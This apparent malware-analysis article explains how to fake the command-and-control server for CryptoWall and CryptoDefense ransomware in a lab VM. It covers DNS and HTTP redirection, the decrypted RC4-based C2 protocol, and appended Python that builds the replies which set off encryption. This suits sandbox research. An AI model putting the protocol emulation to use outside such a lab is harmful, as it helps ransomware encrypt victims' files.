In this article I'm going to describe a way to create a fake C&C for the CryptoWall and CryptoDefense families, and how to get samples of these families running in a VMware virtual machine, for example.
First, we need to redirect every connection the ransomware makes to our server. Depending on the sample they connect to different domains, so we need to redirect every connection, whatever the name requested, to our fake server.
We will use Metasploit's fakedns module for this purpose:
msf > use auxiliary/server/fakedns
msf auxiliary(fakedns) > set TARGETACTION FAKE
TARGETACTION => FAKE
msf auxiliary(fakedns) > set TARGETDOMAIN *
TARGETDOMAIN => *
msf auxiliary(fakedns) > set TARGETHOST 192.168.2.2
TARGETHOST => 192.168.2.2
With these commands we create a DNS server that answers every query with 192.168.2.2. An Apache server will be running on this IP address.
Next, we need to redirect every request to our HTTP server (whatever the URI) to the same document. We can do this by adding these lines to httpd.conf:
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/index.php
RewriteRule . /index.php
Now we can implement the PHP that gives the ransomware the responses it needs to work.
CryptoWall
Example query:
8 0.218529 192.168.204.235 141.255.167.3 HTTP 156 POST /w72sh29mlo HTTP/1.1 (application/x-www-form-urlencoded)
w=c13314ada7ed648b9919aeff2306e02241242601e0744aa69304d98065c43670fca844aa579d9ab44f3c1bd89231b9351c34
Here we can see a complete communication extracted from a pcap file:
Q:nvawc5uxnp,3de9a8c4e00c59e80a58059f17cdab179e740ac0337b673dd50e7499b43ea13c1c37d8def042e12d520b49da59650016c9
R:nvawc5uxnp,3deae595eb0f14
Q:ylrq5msbpctg,30c51f5e25a1f0346aa429e82c9db310dbdc13c8a8d11f93e3b8a734aeb90a295f4a01219bf164ce59b57591
Q:ylrq5msbpctg,…
The string before the comma is the RC4 key. The string after the comma is the POST data (in hex).
We can decrypt it with the script in the section Code 1 at the end of this article.
The decrypted queries/responses:
query:{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}
response:{212|1}
query:{7|cw200|99DC835DFC77319C2176AB46302136BF|4}
response:{250|kpai7ycr7jxqkilp.onion|75a5|ES|-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq6ZEGywe2wC83CErmVhB
gn89wi2lq8rQyYZZGCUyQr5cQirN32HX5n6MNcJDjB8uINSosaHHGdCPUeOoetx9
IM3TiXZwwSnteGR+gBry/C7dr3JSAWrnLE+TkeO6mrQ8yUtaZ3ue7XSyvV457jLz
Lg1noHcLL/RXNKsP0MmbZW1yHvRulsuy5XW6clQqNMMmfAAT8y+UwePL7M0YG86q
SP9QQFB3B+FdlRJ/8VlN3Sva1JeXJbxGcbmowwtJEJVZtAuf9c7sDv5Kt1tlH8Z2
VXjg4P2Dw3KUg/7pcfL18SAEfsRBIONFvLNcrVdh0/W5aVh6/9djcnMiCV61CYkS
7wIDAQAB
-----END PUBLIC KEY-----}
We only need to imitate this communication in our PHP to get CryptoWall working.
You can find a functional PHP file in the section Code 2 at the end of this article.
CryptoDefense
CryptoDefense communications are very similar to CryptoWall's. It uses the same query/response mechanism encrypted with RC4, so we can use the same Python script to decrypt the communications. Here is a sample decrypted communication:
query:{1|cw200|99DC835DFC77319C2176AB46302136BF|2|1|2|}
response:{212|1}
With CryptoDefense we only need to respond with an "OK" response to the client and it starts encrypting.
The PHP file in the section Code 2 at the end of this article works for both CryptoWall and CryptoDefense.
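The decryption step described under "Code 1" and the response logic of "Code 2" share the same mechanism: RC4 with the key taken from the string before the comma, applied to the hex data after it. The following is an added example, not the article's own scripts, that decodes `Q:<key>,<hex>` / `R:<key>,<hex>` lines into their pipe-delimited fields and builds the encrypted reply a fake C&C must return. The sample key, machine ID, onion address and public key are constructed placeholders.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encrypting and decrypting are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def derive_key(uri_string: str) -> bytes:
    # As the article states, the string before the comma is the RC4 key.
    # Later CryptoWall builds transform this string before use; if decrypted
    # output is not printable, this is the function to adjust.
    return uri_string.encode()

def decode_line(line: str):
    """'Q:<key>,<hex>' or 'R:<key>,<hex>' -> (direction, key, fields).
    Plaintext is '{field|field|...}'; an empty trailing field ('...|2|}') is dropped."""
    direction, rest = line.split(":", 1)
    key, hexdata = rest.split(",", 1)
    plain = rc4(derive_key(key), bytes.fromhex(hexdata)).decode("latin-1")
    if not (plain.startswith("{") and plain.endswith("}")):
        raise ValueError(f"not a CryptoWall/CryptoDefense message: {plain!r}")
    return direction, key, plain[1:-1].rstrip("|").split("|")

def encode_response(key: str, fields: list) -> str:
    """Build the 'R:<key>,<hex>' line a fake C&C returns: the reply is
    RC4-encrypted with the same key the client used for its query."""
    plain = "{" + "|".join(fields) + "}"
    return f"R:{key}," + rc4(derive_key(key), plain.encode()).hex()

def fake_cnc(query_line: str) -> str:
    """Answer a query the way the decrypted exchange above shows: a message
    whose first field is 1 gets '{212|1}', first field 7 gets the '{250|...}'
    reply. The onion address and PEM block here are constructed placeholders."""
    _, key, fields = decode_line(query_line)
    if fields[0] == "1":
        return encode_response(key, ["212", "1"])
    if fields[0] == "7":
        return encode_response(key, ["250", "placeholder.onion", "75a5", "ES",
                                     "-----BEGIN PUBLIC KEY-----PLACEHOLDER-----END PUBLIC KEY-----"])
    raise ValueError(f"unhandled message type {fields[0]}")
```

Because the reply length equals the plaintext length under RC4, a correct `{212|1}` answer is always 7 bytes (14 hex digits), which matches the `R:` line captured above and is a quick sanity check on the server's output.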